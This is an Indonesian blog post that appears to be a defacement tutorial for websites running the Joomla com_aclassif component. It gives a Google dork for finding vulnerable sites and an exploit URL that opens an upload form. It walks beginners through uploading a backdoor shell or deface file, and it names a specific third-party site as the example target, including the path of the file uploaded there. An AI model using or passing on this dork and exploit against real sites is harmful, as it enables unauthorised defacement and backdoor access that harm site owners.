Deface dengan com_acclasif Fahmi J rwxr-xr-x 0 00.05

Filename	Deface dengan com_acclasif
Permission	rw-r--r--
Author	Fahmi J
Date and Time	00.05
Label
Action

Ini exploit lama sih. tapi baru nemu tadi di grup. Yaudah sekalian share di blog. Mungkin berguna buat newbie seperti saya . =)).
Oke, langsung saja.
Bahan :
1. backdoor shell, file .html / .txt
2. dork : inurl:"index.php?option=com_aclassif"
3. Exploit : index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1
Langsung saja kita cari target di google dengan dork diatas.

Sebagai contoh, saya dapet target http://www.stabledock.com/
masukkan exploitnya menjadi : http://www.stabledock.com/index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1
 https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRnGbDUZdBGDxceVuLsfhsKkNW6oW1CUO0jJI7Dh6tHrYWeIfUsDGI3rI3eZeHF5QAy6a4qhepeXX81Sd7P0Oa55D-R8CLxpwnKxJNAbLeONNEdXmZVLsVJnNXJAp7wyOtyNCuKetCAdMd/s320/step1.png
Tinggal isi data datanya. Boleh ngasal kok. Terakhir, upload filenya di attachment .
NB : beberapa situs memungkinkan kita untuk upload file .php dan .html , namun ada juga yang hanya bisa upload .txt seperti situs diatas.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2MSXwKrds9_WeXcDw62mN1K3-vET6OmyJyPIOOWpqBxGFeSf5tsWHSkRXndXhSdwH9sI5oWXUrPu8tl9kbjebEYKJj31520a9s4HYWNXFuPetDvQXqQVGjHk7o8_HFOdEOuC0cODInGl0/s320/step2.png
Jika sudah, tinggal klik link yang ada di keterangan seperti gambar diatas.
http://www.stabledock.com/components/com_aclassif/photos/mtmd23.txt

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEEaDRkcikOkCLVZZ8qCw_j_pmQmg-FatUu_hahwkEdku1DMjv21zgAowh7RVAUw3wAbfEIRWm7ESyCY3MEiXdtoqk8lG4o8Z7foZEUXfKxKjmz1quYXPmaACOdaj5RAdtEtVvm8cJXh99/s320/step2.png
Sekian tutorial kali ini. Semoga bermanfaat.

Sumber : Madura Cyber